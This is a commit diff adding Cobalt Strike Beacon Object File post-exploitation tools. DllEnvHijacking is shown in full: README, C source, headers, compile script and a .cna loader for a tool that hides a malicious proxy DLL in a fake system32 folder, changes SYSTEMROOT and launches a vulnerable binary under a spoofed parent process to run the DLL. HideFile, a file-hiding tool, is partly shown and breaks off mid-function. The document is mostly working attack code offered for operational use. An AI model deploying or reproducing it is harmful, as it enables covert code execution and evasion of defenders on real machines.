update

KIT/DllEnvHijacking/README.md

@@ -0,0 +1,22 @@
+# DllEnvHijacking
+This tool will: setup a hidden file structure, move an already on disk present malicious proxy DLL to the new system32 folder, hide the proxy DLL, modify the SYSTEMROOT environment variable, run the vulnerable binary as a spoofed process to execute the malicious DLL, and reset the original SYSTEMROOT environment variable so the beacon keeps working as intended. 
+
+>Make sure that before you run this tool, the uploaded you malicious proxy DLL to an accessible folder on disk. 
+
+More information about the DLL Environment Hijacking attack can be found [here](https://www.wietzebeukema.nl/blog/save-the-environment-variables). 
+
+## Options
+* `<new sysroot dir>:` the new directory name as a path that will be used as the new SYSTEMROOT variable like `C:\Data\` (make sure the directory path ends with `\`)
+* `<malicious DLL name>`: the name of the malicious DLL that will be loaded by the vulnerable binary (e.g. mswsock.dll).
+* `<path to mal. DLL folder>`: the path on the target system to the folder were the malicious DLL is stored (don't add the DLL name and end the path with a `\`)
+* `<name of vulnerable binary>`: the name of the vulnerable binary that will be executed and loads the malicious DLL (e.g. hostname.exe).
+* `<pid parent proc>`: the process ID of the parent process under which the vulnerable binary will run as a child.
+
+## Usage
+* `dllenvhijacking <new sysroot dir> <malicious DLL name> <path to mal. DLL folder> <name of vulnerable binary> <pid parent proc>`
+
+## Compile
+- 1\. Make sure Visual Studio is installed and supports C/C++.
+- 2\. Open the `x64 Native Tools Command Prompt for VS <2019/2022>` terminal.
+- 3\. Run the `bofcompile.bat` script to compile the object file. 
+- 4\. In Cobalt strike, use the script manager to load the .cna script to import the tool. 

KIT/DllEnvHijacking/beacon.h

@@ -0,0 +1,69 @@
+/*
+ * Beacon Object Files (BOF)
+ * -------------------------
+ * A Beacon Object File is a light-weight post exploitation tool that runs
+ * with Beacon's inline-execute command.
+ *
+ * Additional BOF resources are available here:
+ *   - https://github.com/Cobalt-Strike/bof_template
+ *
+ * Cobalt Strike 4.x
+ * ChangeLog:
+ *    1/25/2022: updated for 4.5
+ */
+
+/* data API */
+typedef struct {
+	char * original; /* the original buffer [so we can free it] */
+	char * buffer;   /* current pointer into our buffer */
+	int    length;   /* remaining length of data */
+	int    size;     /* total size of this buffer */
+} datap;
+
+DECLSPEC_IMPORT void    BeaconDataParse(datap * parser, char * buffer, int size);
+DECLSPEC_IMPORT char *  BeaconDataPtr(datap * parser, int size);
+DECLSPEC_IMPORT int     BeaconDataInt(datap * parser);
+DECLSPEC_IMPORT short   BeaconDataShort(datap * parser);
+DECLSPEC_IMPORT int     BeaconDataLength(datap * parser);
+DECLSPEC_IMPORT char *  BeaconDataExtract(datap * parser, int * size);
+
+/* format API */
+typedef struct {
+	char * original; /* the original buffer [so we can free it] */
+	char * buffer;   /* current pointer into our buffer */
+	int    length;   /* remaining length of data */
+	int    size;     /* total size of this buffer */
+} formatp;
+
+DECLSPEC_IMPORT void    BeaconFormatAlloc(formatp * format, int maxsz);
+DECLSPEC_IMPORT void    BeaconFormatReset(formatp * format);
+DECLSPEC_IMPORT void    BeaconFormatAppend(formatp * format, char * text, int len);
+DECLSPEC_IMPORT void    BeaconFormatPrintf(formatp * format, char * fmt, ...);
+DECLSPEC_IMPORT char *  BeaconFormatToString(formatp * format, int * size);
+DECLSPEC_IMPORT void    BeaconFormatFree(formatp * format);
+DECLSPEC_IMPORT void    BeaconFormatInt(formatp * format, int value);
+
+/* Output Functions */
+#define CALLBACK_OUTPUT      0x0
+#define CALLBACK_OUTPUT_OEM  0x1e
+#define CALLBACK_OUTPUT_UTF8 0x20
+#define CALLBACK_ERROR       0x0d
+
+DECLSPEC_IMPORT void   BeaconOutput(int type, char * data, int len);
+DECLSPEC_IMPORT void   BeaconPrintf(int type, char * fmt, ...);
+
+
+/* Token Functions */
+DECLSPEC_IMPORT BOOL   BeaconUseToken(HANDLE token);
+DECLSPEC_IMPORT void   BeaconRevertToken();
+DECLSPEC_IMPORT BOOL   BeaconIsAdmin();
+
+/* Spawn+Inject Functions */
+DECLSPEC_IMPORT void   BeaconGetSpawnTo(BOOL x86, char * buffer, int length);
+DECLSPEC_IMPORT void   BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len);
+DECLSPEC_IMPORT void   BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len);
+DECLSPEC_IMPORT BOOL   BeaconSpawnTemporaryProcess(BOOL x86, BOOL ignoreToken, STARTUPINFO * si, PROCESS_INFORMATION * pInfo);
+DECLSPEC_IMPORT void   BeaconCleanupProcess(PROCESS_INFORMATION * pInfo);
+
+/* Utility Functions */
+DECLSPEC_IMPORT BOOL   toWideChar(char * src, wchar_t * dst, int max);

KIT/DllEnvHijacking/bofcompile.bat

@@ -0,0 +1,6 @@
+@ECHO OFF
+
+cl.exe /nologo /c /Od /MT /W0 /GS- /Tc dllenvhijacking.c
+move /y dllenvhijacking.obj dllenvhijacking.o
+dumpbin /disasm dllenvhijacking.o > dllenvhijacking.disasm
+

KIT/DllEnvHijacking/dllenvhijacking.c

@@ -0,0 +1,200 @@
+#include <windows.h>
+#include <stdio.h>
+#include "dllenvhijacking.h"
+#include "beacon.h"
+
+
+
+BOOL CreateHiddenDir(WCHAR *directory) {
+	DWORD attrib;
+	
+	if(KERNEL32$CreateDirectoryW(directory, NULL) == 0) {
+		if(KERNEL32$GetLastError() == 183) BeaconPrintf(CALLBACK_ERROR, "Failed to create directory: ERROR_ALREADY_EXISTS\n");
+		if(KERNEL32$GetLastError() == 3) BeaconPrintf(CALLBACK_ERROR, "Failed to create directory: ERROR_PATH_NOT_FOUND\n");
+		return FALSE;
+	}
+		
+	attrib = KERNEL32$GetFileAttributesW(directory);
+	if(attrib == INVALID_FILE_ATTRIBUTES) {
+		BeaconPrintf(CALLBACK_ERROR, "Failed to retrieve file attribute information from directory with error code: %ld\n", KERNEL32$GetLastError());
+		return FALSE;
+	}
+	attrib |= FILE_ATTRIBUTE_HIDDEN;
+	attrib |= FILE_ATTRIBUTE_SYSTEM;
+
+	if(KERNEL32$SetFileAttributesW(directory, attrib) == 0) {
+		BeaconPrintf(CALLBACK_ERROR, "Failed to set new attribute information on the directory with error code: %ld\n", KERNEL32$GetLastError());
+		return FALSE;
+	}
+	return TRUE;
+}
+
+
+BOOL CreateHiddenFile(WCHAR *file) {
+	HANDLE hFile;
+	FILE_BASIC_INFORMATION fileInfo;
+	IO_STATUS_BLOCK ioStatusBlock;
+	
+
+	NtQueryInformationFile_t pNtQueryInformationFile = (NtQueryInformationFile_t)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryInformationFile");
+	if(pNtQueryInformationFile == NULL) return 0;
+
+    NtSetInformationFile_t pNtSetInformationFile = (NtSetInformationFile_t)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtSetInformationFile");
+	if(pNtSetInformationFile == NULL) return 0;
+
+
+	hFile = KERNEL32$CreateFileW(file, GENERIC_READ | GENERIC_WRITE | FILE_WRITE_ATTRIBUTES, 0, NULL, OPEN_EXISTING, 0, NULL);
+	if (hFile == INVALID_HANDLE_VALUE) {
+		BeaconPrintf(CALLBACK_ERROR, "Could not open file with error code: %ld\n", KERNEL32$GetLastError());
+		return FALSE;
+	}
+
+	if (pNtQueryInformationFile(hFile, &ioStatusBlock, &fileInfo, sizeof(FILE_BASIC_INFORMATION), FileBasicInformation) < 0) {
+		BeaconPrintf(CALLBACK_ERROR, "Failed to get file attribute information with error code: %ld\n", KERNEL32$GetLastError());
+		KERNEL32$CloseHandle(hFile);
+		return FALSE;
+	}
+	
+	fileInfo.FileAttributes |= FILE_ATTRIBUTE_HIDDEN;
+	fileInfo.FileAttributes |= FILE_ATTRIBUTE_SYSTEM;
+	
+
+	if (pNtSetInformationFile(hFile, &ioStatusBlock, &fileInfo, sizeof(FILE_BASIC_INFORMATION), FileBasicInformation) < 0) {
+		BeaconPrintf(CALLBACK_ERROR, "Failed to set new attribute information on the file with error code: %ld\n", KERNEL32$GetLastError());
+		KERNEL32$CloseHandle(hFile);
+		return FALSE;
+	}
+
+	KERNEL32$CloseHandle(hFile);
+	return TRUE;
+}
+
+
+BOOL MoveDLL(WCHAR *dllSrcPath, WCHAR *dllDstPath) {
+	if (KERNEL32$MoveFileW(dllSrcPath, dllDstPath) == 0) {
+		BeaconPrintf(CALLBACK_ERROR, "Failed to move %ls with error code: %ld\n", dllSrcPath, KERNEL32$GetLastError());
+		return FALSE; 
+	}
+
+	return TRUE;
+}
+
+
+BOOL RunProc(WCHAR *sysrootPath, char *targetProcPath, int pid) {
+	STARTUPINFOEX info = { sizeof(info) };
+    PROCESS_INFORMATION processInfo;
+	SIZE_T cbAttributeListSize = 0;
+	PPROC_THREAD_ATTRIBUTE_LIST pAttributeList = NULL;
+	HANDLE hParentProcess = NULL;
+	BOOL setEnvSuccess = TRUE;
+	
+	//set env variable to new systemroot
+	if (KERNEL32$SetEnvironmentVariableW(L"SYSTEMROOT", sysrootPath) == 0) {
+		BeaconPrintf(CALLBACK_ERROR, "Failed to set the new environment variable!\n");
+		return FALSE; 
+	}
+	
+	// create fresh attributelist
+	KERNEL32$InitializeProcThreadAttributeList(NULL, 1, 0, &cbAttributeListSize); 
+	pAttributeList = (PPROC_THREAD_ATTRIBUTE_LIST) KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), 0, cbAttributeListSize);
+	KERNEL32$InitializeProcThreadAttributeList(pAttributeList, 1, 0, &cbAttributeListSize);
+
+	// copy and spoof parent process ID
+	hParentProcess = KERNEL32$OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
+	KERNEL32$UpdateProcThreadAttribute(pAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &hParentProcess, sizeof(HANDLE), NULL, NULL);
+	info.lpAttributeList = pAttributeList;
+	
+	// start new process under spoofed process in suspended state
+	if (KERNEL32$CreateProcessA(NULL, targetProcPath, NULL, NULL, FALSE, CREATE_NEW_CONSOLE | EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, &info.StartupInfo, &processInfo) == 0) {
+		setEnvSuccess = FALSE;
+	}
+	
+	//reset environment variable for beacon
+	if (KERNEL32$SetEnvironmentVariableW(L"SYSTEMROOT", L"C:\\Windows\\") == 0) {
+		BeaconPrintf(CALLBACK_ERROR, "Failed to reset the old environment variable!\n");
+	}
+
+	//clean up
+	KERNEL32$DeleteProcThreadAttributeList(pAttributeList);
+	KERNEL32$CloseHandle(hParentProcess);
+	KERNEL32$CloseHandle(processInfo.hProcess);
+	KERNEL32$CloseHandle(processInfo.hThread);
+
+	return setEnvSuccess;
+}
+
+
+int go(char *args, int len) {
+	WCHAR wsys32[] = L"system32\\";
+	char sys32[] = "C:\\windows\\system32\\";
+	WCHAR newSys32Path[100]; 
+	WCHAR dllDstPath[100]; 
+	WCHAR dllSrcPath[100]; 
+	char targetProcPath[100];
+	WCHAR *sysrootPath; //L"C:\\Data\\";
+	WCHAR *proxyDll; //L"mswsock.dll"
+	WCHAR *inputDllSrcPath; //L"C:\\Users\\Public\\Documents\\"
+	char *targetProc; //"hostname.exe"
+	int *pid; //5456
+	BOOL res = FALSE;
+	datap parser;
+	
+	BeaconDataParse(&parser, args, len);
+	sysrootPath = BeaconDataExtract(&parser, NULL);
+	proxyDll = BeaconDataExtract(&parser, NULL);
+	inputDllSrcPath = BeaconDataExtract(&parser, NULL);
+	targetProc = BeaconDataExtract(&parser, NULL);
+	pid = BeaconDataInt(&parser);
+	
+
+	res = CreateHiddenDir(sysrootPath);
+	if (!res) return 0;
+	else {
+		res = FALSE;
+	}
+
+	MSVCRT$wcscpy(newSys32Path, sysrootPath);
+	MSVCRT$wcscat(newSys32Path, wsys32);
+	res = CreateHiddenDir(newSys32Path);
+	if (!res) return 0;
+	else {
+		BeaconPrintf(CALLBACK_OUTPUT, "[+] Created new directory structure %ls as systemfile + hidden\n", newSys32Path);
+		res = FALSE;
+	}
+	
+	MSVCRT$wcscpy(dllDstPath, newSys32Path);
+	MSVCRT$wcscat(dllDstPath, proxyDll);
+	MSVCRT$wcscpy(dllSrcPath, inputDllSrcPath);
+	MSVCRT$wcscat(dllSrcPath, proxyDll);
+	res = MoveDLL(dllSrcPath, dllDstPath);
+	if (!res) return 0;
+	else {
+		res = FALSE;
+	}
+	
+	res = CreateHiddenFile(dllDstPath);
+	if (!res) return 0;
+	else {
+		BeaconPrintf(CALLBACK_OUTPUT, "[+] Moved DLL to location %ls and made it a systemfile + hidden\n", dllDstPath);
+		res = FALSE;
+	}
+	
+	MSVCRT$strcpy(targetProcPath, sys32);
+	MSVCRT$strcat(targetProcPath, targetProc);
+	res = RunProc(sysrootPath, targetProcPath, pid);
+	if (!res) BeaconPrintf(CALLBACK_ERROR, "Failed to start process %s as a spoofed child from PID: %d\n", targetProcPath, pid);
+	else {
+		BeaconPrintf(CALLBACK_OUTPUT, "[+] Modified SYSTEMROOT environment variable to %ls and executed the DLL as a spoofed process of PID: %d\n",sysrootPath, pid);
+	}
+	
+	return 0;
+}
+
+
+
+
+
+
+
+
+

KIT/DllEnvHijacking/dllenvhijacking.cna

@@ -0,0 +1,35 @@
+# author REDMED-X
+
+beacon_command_register(
+	"dllenvhijacking", "BOF implementation of DLL environment hijacking.\n",
+	"INFO:\nThis tool will setup a hidden file structure, move an already on disk present malicious proxy DLL to the new system32 folder, hide the proxy DLL, modify the SYSTEMROOT environment variable, run the vulnerable binary as a spoofed process to execute the malicious DLL, and reset the original SYSTEMROOT environment variable so the beacon keeps working as intended.\n\nOPTIONS:\n[<new sysroot dir>]: the new directory name as a path that will be used as the new SYSTEMROOT variable like C:\\Data\\ (make sure the directory path ends with \\).\n[<malicious DLL name>]: the name of the malicious DLL that will be loaded by the vulnerable binary (e.g. mswsock.dll).\n[<path to mal. DLL folder>]: the path on the target system to the folder were the malicious DLL is stored (don't add the DLL name and end the path with a \\).\n[<name of vulnerable binary>]: the name of the vulnerable binary that will be executed and loads the malicious DLL (e.g. hostname.exe).\n[<pid parent proc>]: the process ID of the parent process under which the vulnerable binary will run as a child.\n\n" .
+	"USAGE:\ndllenvhijacking <new sysroot dir> <malicious DLL name> <path to mal. DLL folder> <name of vulnerable binary> <pid parent proc>\n\n");
+
+
+alias dllenvhijacking {
+    $bid = $1;
+    $sysroot = $2;
+	$proxydll = $3;
+	$pathtodll = $4;
+	$vulnbinary = $5;
+	$pid = $6;
+
+	if ($sysroot eq "" || $proxydll eq "" || $pathtodll eq "" || $vulnbinary eq "" || $pid eq "") {
+		berror($bid, "Please make sure that all the arguments are filled in and correct!\n");
+		return;
+	}
+	
+    # Read in the right BOF file
+    $handle = openf(script_resource("dllenvhijacking.o"));
+    $data   = readb($handle, -1);
+    closef($handle);
+
+	# Pack our arguments
+    $arg_data  = bof_pack($bid, "ZZZzi", $sysroot, $proxydll, $pathtodll, $vulnbinary, $pid);
+	
+
+	blog($bid, "Tasked execute DLL Environment hijacking..");
+    beacon_inline_execute($bid, $data, "go", $arg_data);
+}
+
+

KIT/DllEnvHijacking/dllenvhijacking.h

@@ -0,0 +1,150 @@
+#include <windows.h>
+
+typedef struct _FILE_BASIC_INFORMATION {
+	LARGE_INTEGER CreationTime;				// absolute system, number of 100-nanosecond intervals 
+	LARGE_INTEGER LastAccessTime;			// since the start of the year 1601 in the Gregorian calendar.
+	LARGE_INTEGER LastWriteTime;
+	LARGE_INTEGER ChangeTime;
+	ULONG FileAttributes;					// metadata about the file, ex.: archive, compressed, directory, hidden, etc.
+} FILE_BASIC_INFORMATION, *PFILE_BASIC_INFORMATION;
+
+
+typedef enum _FILE_INFORMATION_CLASS {
+    FileDirectoryInformation                         = 1,
+    FileFullDirectoryInformation,                   // 2
+    FileBothDirectoryInformation,                   // 3
+    FileBasicInformation,                           // 4
+    FileStandardInformation,                        // 5
+    FileInternalInformation,                        // 6
+    FileEaInformation,                              // 7
+    FileAccessInformation,                          // 8
+    FileNameInformation,                            // 9
+    FileRenameInformation,                          // 10
+    FileLinkInformation,                            // 11
+    FileNamesInformation,                           // 12
+    FileDispositionInformation,                     // 13
+    FilePositionInformation,                        // 14
+    FileFullEaInformation,                          // 15
+    FileModeInformation,                            // 16
+    FileAlignmentInformation,                       // 17
+    FileAllInformation,                             // 18
+    FileAllocationInformation,                      // 19
+    FileEndOfFileInformation,                       // 20
+    FileAlternateNameInformation,                   // 21
+    FileStreamInformation,                          // 22
+    FilePipeInformation,                            // 23
+    FilePipeLocalInformation,                       // 24
+    FilePipeRemoteInformation,                      // 25
+    FileMailslotQueryInformation,                   // 26
+    FileMailslotSetInformation,                     // 27
+    FileCompressionInformation,                     // 28
+    FileObjectIdInformation,                        // 29
+    FileCompletionInformation,                      // 30
+    FileMoveClusterInformation,                     // 31
+    FileQuotaInformation,                           // 32
+    FileReparsePointInformation,                    // 33
+    FileNetworkOpenInformation,                     // 34
+    FileAttributeTagInformation,                    // 35
+    FileTrackingInformation,                        // 36
+    FileIdBothDirectoryInformation,                 // 37
+    FileIdFullDirectoryInformation,                 // 38
+    FileValidDataLengthInformation,                 // 39
+    FileShortNameInformation,                       // 40
+    FileIoCompletionNotificationInformation,        // 41
+    FileIoStatusBlockRangeInformation,              // 42
+    FileIoPriorityHintInformation,                  // 43
+    FileSfioReserveInformation,                     // 44
+    FileSfioVolumeInformation,                      // 45
+    FileHardLinkInformation,                        // 46
+    FileProcessIdsUsingFileInformation,             // 47
+    FileNormalizedNameInformation,                  // 48
+    FileNetworkPhysicalNameInformation,             // 49
+    FileIdGlobalTxDirectoryInformation,             // 50
+    FileIsRemoteDeviceInformation,                  // 51
+    FileUnusedInformation,                          // 52
+    FileNumaNodeInformation,                        // 53
+    FileStandardLinkInformation,                    // 54
+    FileRemoteProtocolInformation,                  // 55
+    FileRenameInformationBypassAccessCheck,         // 56
+    FileLinkInformationBypassAccessCheck,           // 57
+    FileVolumeNameInformation,                      // 58
+    FileIdInformation,                              // 59
+    FileIdExtdDirectoryInformation,                 // 60
+    FileReplaceCompletionInformation,               // 61
+    FileHardLinkFullIdInformation,                  // 62
+    FileIdExtdBothDirectoryInformation,             // 63
+    FileDispositionInformationEx,                   // 64
+    FileRenameInformationEx,                        // 65
+    FileRenameInformationExBypassAccessCheck,       // 66
+    FileDesiredStorageClassInformation,             // 67
+    FileStatInformation,                            // 68
+    FileMemoryPartitionInformation,                 // 69
+    FileStatLxInformation,                          // 70
+    FileCaseSensitiveInformation,                   // 71
+    FileLinkInformationEx,                          // 72
+    FileLinkInformationExBypassAccessCheck,         // 73
+    FileStorageReserveIdInformation,                // 74
+    FileCaseSensitiveInformationForceAccessCheck,   // 75
+    FileKnownFolderInformation,   					// 76
+    FileMaximumInformation
+} FILE_INFORMATION_CLASS, *PFILE_INFORMATION_CLASS;
+
+
+typedef struct _IO_STATUS_BLOCK {
+  union {
+    NTSTATUS Status;
+    PVOID    Pointer;
+  };
+  ULONG_PTR Information;
+} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;
+
+
+typedef NTSTATUS (NTAPI *NtQueryInformationFile_t)(
+  HANDLE                 FileHandle,
+  PIO_STATUS_BLOCK       IoStatusBlock,
+  PVOID                  FileInformation,
+  ULONG                  Length,
+  FILE_INFORMATION_CLASS FileInformationClass
+);
+
+
+typedef NTSTATUS (NTAPI *NtSetInformationFile_t)(
+  HANDLE                 FileHandle,
+  PIO_STATUS_BLOCK       IoStatusBlock,
+  PVOID                  FileInformation,
+  ULONG                  Length,
+  FILE_INFORMATION_CLASS FileInformationClass
+);
+
+//CreateHiddenDir
+DECLSPEC_IMPORT BOOL WINAPI KERNEL32$CreateDirectoryW(LPCWSTR lpPathName, LPSECURITY_ATTRIBUTES lpSecurityAttributes);
+DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetFileAttributesW(LPCWSTR lpFileName);
+DECLSPEC_IMPORT BOOL WINAPI KERNEL32$SetFileAttributesW(LPCWSTR lpFileName, DWORD dwFileAttributes);
+DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetLastError(void);
+WINBASEAPI int __cdecl MSVCRT$printf(const char * _Format,...); 
+WINBASEAPI int __cdecl MSVCRT$getchar(void); 
+
+//CreateHiddenFile
+DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$CreateFileW(LPCWSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile);
+DECLSPEC_IMPORT BOOL WINAPI KERNEL32$CloseHandle (HANDLE hObject);
+
+//MoveDLL
+DECLSPEC_IMPORT BOOL WINAPI KERNEL32$MoveFileW(LPCWSTR lpExistingFileName, LPCWSTR lpNewFileName);
+
+//RunProc
+DECLSPEC_IMPORT BOOL WINAPI KERNEL32$SetEnvironmentVariableW(LPCWSTR lpName, LPCWSTR lpValue);
+DECLSPEC_IMPORT BOOL WINAPI KERNEL32$CreateProcessA(LPCSTR lpApplicationName, LPSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCSTR lpCurrentDirectory, LPSTARTUPINFOA lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation);
+DECLSPEC_IMPORT BOOL WINAPI KERNEL32$InitializeProcThreadAttributeList(LPPROC_THREAD_ATTRIBUTE_LIST lpAttributeList, DWORD dwAttributeCount, DWORD dwFlags, PSIZE_T lpSize);
+DECLSPEC_IMPORT LPVOID WINAPI KERNEL32$HeapAlloc(HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes);
+DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$GetProcessHeap();
+DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$OpenProcess(DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwProcessId);
+DECLSPEC_IMPORT BOOL WINAPI KERNEL32$UpdateProcThreadAttribute(LPPROC_THREAD_ATTRIBUTE_LIST lpAttributeList, DWORD dwFlags, DWORD_PTR Attribute, PVOID lpValue, SIZE_T cbSize, PVOID lpPreviousValue, PSIZE_T lpReturnSize);
+DECLSPEC_IMPORT void WINAPI KERNEL32$DeleteProcThreadAttributeList(LPPROC_THREAD_ATTRIBUTE_LIST lpAttributeList);
+
+//main
+WINBASEAPI wchar_t * __cdecl MSVCRT$wcscpy(wchar_t *destination, const wchar_t *source);
+WINBASEAPI wchar_t * __cdecl MSVCRT$wcscat(wchar_t *destination, const wchar_t *source);
+WINBASEAPI char * __cdecl MSVCRT$strcpy(char *destination, const char *source);
+WINBASEAPI char * __cdecl MSVCRT$strcat(char *destination, const char *source);
+WINBASEAPI size_t __cdecl MSVCRT$wcslen(const wchar_t *string);
+

KIT/HideFile/README.md

@@ -0,0 +1,16 @@
+# HideFile
+Hide a directory or file from plain sight by modifying the attributes and set them to systemfile + hidden.
+
+## Options
+* `dir`: set this option if you want to modify the attributes of a directory.
+* `file`: set this option if you want to modify the attributes of a file.
+* `<path to dir/file>`: path to the directory or file that you want to hide.
+
+## Usage
+* `hidefile <dir | file> <path to dir/file>`
+
+## Compile
+- 1\. Make sure Visual Studio is installed and supports C/C++.
+- 2\. Open the `x64 Native Tools Command Prompt for VS <2019/2022>` terminal.
+- 3\. Run the `bofcompile.bat` script to compile the object file. 
+- 4\. In Cobalt strike, use the script manager to load the .cna script to import the tool. 

KIT/HideFile/beacon.h

@@ -0,0 +1,69 @@
+/*
+ * Beacon Object Files (BOF)
+ * -------------------------
+ * A Beacon Object File is a light-weight post exploitation tool that runs
+ * with Beacon's inline-execute command.
+ *
+ * Additional BOF resources are available here:
+ *   - https://github.com/Cobalt-Strike/bof_template
+ *
+ * Cobalt Strike 4.x
+ * ChangeLog:
+ *    1/25/2022: updated for 4.5
+ */
+
+/* data API */
+typedef struct {
+	char * original; /* the original buffer [so we can free it] */
+	char * buffer;   /* current pointer into our buffer */
+	int    length;   /* remaining length of data */
+	int    size;     /* total size of this buffer */
+} datap;
+
+DECLSPEC_IMPORT void    BeaconDataParse(datap * parser, char * buffer, int size);
+DECLSPEC_IMPORT char *  BeaconDataPtr(datap * parser, int size);
+DECLSPEC_IMPORT int     BeaconDataInt(datap * parser);
+DECLSPEC_IMPORT short   BeaconDataShort(datap * parser);
+DECLSPEC_IMPORT int     BeaconDataLength(datap * parser);
+DECLSPEC_IMPORT char *  BeaconDataExtract(datap * parser, int * size);
+
+/* format API */
+typedef struct {
+	char * original; /* the original buffer [so we can free it] */
+	char * buffer;   /* current pointer into our buffer */
+	int    length;   /* remaining length of data */
+	int    size;     /* total size of this buffer */
+} formatp;
+
+DECLSPEC_IMPORT void    BeaconFormatAlloc(formatp * format, int maxsz);
+DECLSPEC_IMPORT void    BeaconFormatReset(formatp * format);
+DECLSPEC_IMPORT void    BeaconFormatAppend(formatp * format, char * text, int len);
+DECLSPEC_IMPORT void    BeaconFormatPrintf(formatp * format, char * fmt, ...);
+DECLSPEC_IMPORT char *  BeaconFormatToString(formatp * format, int * size);
+DECLSPEC_IMPORT void    BeaconFormatFree(formatp * format);
+DECLSPEC_IMPORT void    BeaconFormatInt(formatp * format, int value);
+
+/* Output Functions */
+#define CALLBACK_OUTPUT      0x0
+#define CALLBACK_OUTPUT_OEM  0x1e
+#define CALLBACK_OUTPUT_UTF8 0x20
+#define CALLBACK_ERROR       0x0d
+
+DECLSPEC_IMPORT void   BeaconOutput(int type, char * data, int len);
+DECLSPEC_IMPORT void   BeaconPrintf(int type, char * fmt, ...);
+
+
+/* Token Functions */
+DECLSPEC_IMPORT BOOL   BeaconUseToken(HANDLE token);
+DECLSPEC_IMPORT void   BeaconRevertToken();
+DECLSPEC_IMPORT BOOL   BeaconIsAdmin();
+
+/* Spawn+Inject Functions */
+DECLSPEC_IMPORT void   BeaconGetSpawnTo(BOOL x86, char * buffer, int length);
+DECLSPEC_IMPORT void   BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len);
+DECLSPEC_IMPORT void   BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len);
+DECLSPEC_IMPORT BOOL   BeaconSpawnTemporaryProcess(BOOL x86, BOOL ignoreToken, STARTUPINFO * si, PROCESS_INFORMATION * pInfo);
+DECLSPEC_IMPORT void   BeaconCleanupProcess(PROCESS_INFORMATION * pInfo);
+
+/* Utility Functions */
+DECLSPEC_IMPORT BOOL   toWideChar(char * src, wchar_t * dst, int max);

KIT/HideFile/bofcompile.bat

@@ -0,0 +1,6 @@
+@ECHO OFF
+
+cl.exe /nologo /c /Od /MT /W0 /GS- /Tc hidefile.c
+move /y hidefile.obj hidefile.o
+dumpbin /disasm hidefile.o > hidefile.disasm
+

KIT/HideFile/hidefile.c

@@ -0,0 +1,86 @@
+#include <windows.h>
+#include <stdio.h>
+#include "hidefile.h"
+#include "beacon.h"
+
+
+BOOL CreateHiddenDir(WCHAR *directory) {
+	DWORD attrib;
+	attrib = KERNEL32$GetFileAttributesW(directory);
+	if(attrib == INVALID_FILE_ATTRIBUTES) {
+		BeaconPrintf(CALLBACK_ERROR, "Failed to get file attribute information from directory with error code: %ld. Is the path and directory name correct?\n", KERNEL32$GetLastError());
+		return FALSE;
+	}
+	attrib |= FILE_ATTRIBUTE_HIDDEN;
+	attrib |= FILE_ATTRIBUTE_SYSTEM;
+
+	if(KERNEL32$SetFileAttributesW(directory, attrib) == 0) {
+		BeaconPrintf(CALLBACK_ERROR, "Failed to set new attribute information on the directory with error code: %ld\n", KERNEL32$GetLastError());
+		return FALSE;
+	}
+	return TRUE;
+}
+
+
+BOOL CreateHiddenFile(WCHAR *file) {
+	HANDLE hFile;
+	FILE_BASIC_INFORMATION fileInfo;
+	IO_STATUS_BLOCK ioStatusBlock;
+	
+
+	NtQueryInformationFile_t pNtQueryInformationFile = (NtQueryInformationFile_t)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryInformationFile");
+	if(pNtQueryInformationFile == NULL) return 0;
+
+    NtSetInformationFile_t pNtSetInformationFile = (NtSetInformationFile_t)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtSetInformationFile");
+	if(pNtSetInformationFile == NULL) return 0;
+
+
+	hFile = KERNEL32$CreateFileW(file, GENERIC_READ | GENERIC_WRITE | FILE_WRITE_ATTRIBUTES, 0, NULL, OPEN_EXISTING, 0, NULL);
+	if (hFile == INVALID_HANDLE_VALUE) {
+		BeaconPrintf(CALLBACK_ERROR, "Could not open file with error code: %ld\n", KERNEL32$GetLastError());
+		return FALSE;
+	}
+
+	if (pNtQueryInformationFile(hFile, &ioStatusBlock, &fileInfo, sizeof(FILE_BASIC_INFORMATION), FileBasicInformation) < 0) {
+		BeaconPrintf(CALLBACK_ERROR, "Failed to get file attribute information with error code: %ld\n", KERNEL32$GetLastError());
+		KERNEL32$CloseHandle(hFile);
+		return FALSE;
+	}
+	
+	fileInfo.FileAttributes |= FILE_ATTRIBUTE_HIDDEN;
+	fileInfo.FileAttributes |= FILE_ATTRIBUTE_SYSTEM;
+	
+
+	if (pNtSetInformationFile(hFile, &ioStatusBlock, &fileInfo, sizeof(FILE_BASIC_INFORMATION), FileBasicInformation) < 0) {
+		BeaconPrintf(CALLBACK_ERROR, "Failed to set new attribute information on the file with error code: %ld\n", KERNEL32$GetLastError());
+		KERNEL32$CloseHandle(hFile);
+		return FALSE;
+	}
+
+	KERNEL32$CloseHandle(hFile);
+	return TRUE;
+}
+
+
+int go(char *args, int len) {
+	CHAR *option;
+	WCHAR *path;
+	BOOL res = FALSE;
+	datap parser;
+	
+	BeaconDataParse(&parser, args, len);
+	option = BeaconDataExtract(&parser, NULL);
